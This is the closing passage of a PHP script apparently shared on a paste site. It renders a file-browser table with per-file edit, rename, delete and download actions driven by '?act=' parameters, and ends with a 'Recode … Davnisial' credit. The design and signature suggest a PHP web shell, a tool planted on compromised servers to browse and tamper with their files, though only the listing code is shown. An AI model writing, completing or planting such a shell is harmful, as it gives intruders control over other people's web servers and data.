  2258. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2259. echo "<td class='td_home'><center>$ftype</center></td>";
  2260. echo "<td class='td_home'><center>$size</center></td>";
  2261. echo "<td class='td_home'><center>$ftime</center></td>";
  2262. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2263. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2264. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2265. echo "</tr>";
  2266. }
  2267. echo "</table>";
  2268. if(!is_readable($dir)) {
  2269. //
  2270. } else {
  2271. echo "<hr>";
  2272. }
  2273. echo "<center>Recode ".date("Y")." - <a href='#' target='_blank'><font color=red>Davnisial</font></a></center>";
  2274. }
  2275. ?>
  2276. </html>
Add Comment
Please, Sign In to add comment